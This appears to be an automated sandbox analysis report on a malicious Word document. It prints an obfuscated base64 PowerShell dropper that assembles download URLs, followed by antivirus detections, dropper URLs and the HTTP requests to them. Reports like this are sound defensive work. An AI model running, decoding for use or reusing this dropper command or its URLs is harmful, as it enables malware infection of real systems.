IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAd

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://nightlifemumbai.club/x/0wBD3/Avira URL Cloud: Label: malware
                      Source: https://shop.nowfal.dev/wp-includes/RlMObf2j0/Avira URL Cloud: Label: malware
                      Source: https://jflmktg.wpcomstaging.com/wp-content/AK/Avira URL Cloud: Label: malware
                      Source: https://shop.nowfal.devAvira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: shop.nowfal.devVirustotal: Detection: 7%Perma Link
                      Source: e-wdesign.euVirustotal: Detection: 5%Perma Link
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: N00048481397007.docVirustotal: Detection: 16%Perma Link

                      Compliance:

                      barindex
                      Uses insecure TLS / SSL version for HTTPS connectionShow sources
                      Source: unknownHTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49169 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49170 version: TLS 1.0
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2087459336.0000000002290000.00000002.00000001.sdmp
                      Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: global trafficDNS query: name: nightlifemumbai.club
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.88.166:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.217.6.174:80

                      Networking:

                      barindex
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmpString found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
                      Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmpString found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
                      Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmpString found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
                      Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmpString found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
                      Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmpString found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
                      Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmpString found in memory: Do you want to switch to it now?
                      Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmpString found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA
                      Source: powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmpString found in memory: http://nightlifemumbai.club/x/0wBD3/!https://shop.nowfal.dev/wp-includes/RlMObf2j0/!http://e-wdesign.eu/wp-content/bn1IgDejh/!http://traumfrauen-ukraine.de/bin/JyeS/!https://jflmktg.wpcomstaging.com/wp-content/AK/!https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
                      Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmpString found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
                      Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmpString found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
                      Source: global trafficHTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-content/bn1IgDejh/ HTTP/1.1Host: e-wdesign.euConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bin/JyeS/ HTTP/1.1Host: traumfrauen-ukraine.deConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 212.227.200.73 212.227.200.73
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
                      Source: Joe Sandbox ViewASN Name: M247GB M247GB
                      Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
                      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                      Source: unknownHTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49169 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49170 version: TLS 1.0
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5018462-B174-499E-B3BD-E7523F18DF93}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-content/bn1IgDejh/ HTTP/1.1Host: e-wdesign.euConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bin/JyeS/ HTTP/1.1Host: traumfrauen-ukraine.deConnection: Keep-Alive
                      Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091212034.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088276083.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: powershell.exe, 00000005.00000002.2093071337.000000001B590000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: nightlifemumbai.club
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1569Date: Tue, 26 Jan 2021 05:54:56 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
                      Source: powershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
                      Source: powershell.exe, 00000005.00000002.2093071337.000000001B590000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
                      Source: powershell.exe, 00000005.00000002.2095948799.000000001D2B4000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
                      Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                      Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/EncryptionEverywhereDVTLSCA-G1.crt0
                      Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
                      Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                      Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
                      Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                      Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: powershell.exe, 00000005.00000003.2086123235.000000001D35B000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
                      Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: powershell.exe, 00000005.00000003.2086513222.000000001B657000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
                      Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
                      Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
                      Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                      Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                      Source: powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
                      Source: powershell.exe, 00000005.00000003.2086200041.000000001D303000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
                      Source: powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
                      Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                      Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                      Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0L
                      Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                      Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
                      Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                      Source: powershell.exe, 00000005.00000002.2086940849.0000000000391000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: powershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2096359937.000000001D337000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: powershell.exe, 00000005.00000002.2093071337.000000001B590000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab;
                      Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpString found in binary or memory: http://e-wdesign.eu
                      Source: powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmpString found in binary or memory: http://e-wdesign.eu/wp-content/bn1IgDejh/
                      Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
                      Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
                      Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
                      Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
                      Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091212034.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088276083.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
